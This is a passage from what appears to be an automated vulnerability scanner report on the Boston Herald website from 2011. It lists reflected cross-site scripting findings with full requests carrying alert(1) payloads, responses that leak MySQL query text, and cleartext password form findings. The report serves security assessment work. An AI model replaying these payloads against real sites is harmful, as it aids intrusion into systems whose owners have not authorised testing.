You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?eb58b(a)bc791e733d=1 LIMIT 0,20' at line 1
...[SNIP]...

2.36. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quincy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b364'-alert(1)-'a0ab3d5c958 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/quincy/?4b364'-alert(1)-'a0ab3d5c958=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 395
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?4b364'-alert(1)-'a0ab3d5c958=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?4b364'-alert(1)-'a0ab3d5c958=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

2.37. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/suffolk/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 48b0d(a)6246e4e221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/suffolk/?48b0d(a)6246e4e221=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:34:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 367
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?48b0d(a)6246e4e221=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?48b0d(a)6246e4e221=1 LIMIT 0,20' at line 1
...[SNIP]...

2.38. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/suffolk/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a52a7'-alert(1)-'3fe2c2f08cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/suffolk/?a52a7'-alert(1)-'3fe2c2f08cd=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:34:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 397
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?a52a7'-alert(1)-'3fe2c2f08cd=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?a52a7'-alert(1)-'3fe2c2f08cd=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

2.39. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/worcester/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e29cc'-alert(1)-'a2f2f71b2c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/worcester/?e29cc'-alert(1)-'a2f2f71b2c7=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:42:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 401
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?e29cc'-alert(1)-'a2f2f71b2c7=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?e29cc'-alert(1)-'a2f2f71b2c7=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

2.40. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/worcester/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4ac7(a)0dc08ce248a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/worcester/?f4ac7(a)0dc08ce248a=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:42:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 374
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?f4ac7(a)0dc08ce248a=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?f4ac7(a)0dc08ce248a=1 LIMIT 0,20' at line
...[SNIP]...

2.41. http://www.bostonherald.com/search/ [topic parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /search/

Issue detail

The value of the topic request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60651</script><script>alert(1)</script>03fb46f749a was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/?topic=Rep.+James+Vallee60651</script><script>alert(1)</script>03fb46f749a&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:08:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<script language="Javascript">
// Ajax search


page($('search_opt_type').options[$('search_opt_type').selectedIndex].value,'1','','search','Rep. James Vallee60651</script><script>alert(1)</script>03fb46f749a');
//pageTracker._trackPageview('/search/index.bg?&amp;order=&amp;page=1');
location.hash='articleFull';
</script>
...[SNIP]...

2.42. http://www.bostonherald.com/search/ [topic parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /search/

Issue detail

The value of the topic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2820"><script>alert(1)</script>647d2a3054 was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?topic=Rep.+James+Valleec2820"><script>alert(1)</script>647d2a3054&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:08:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<input class="mainSearchinut" id="searchInput" type="text" value="Rep. James Valleec2820"><script>alert(1)</script>647d2a3054" name="topic" />
...[SNIP]...

3. Cleartext submission of password
There are 21 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:20:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 79220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.2. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:11:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.3. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 99426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.4. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
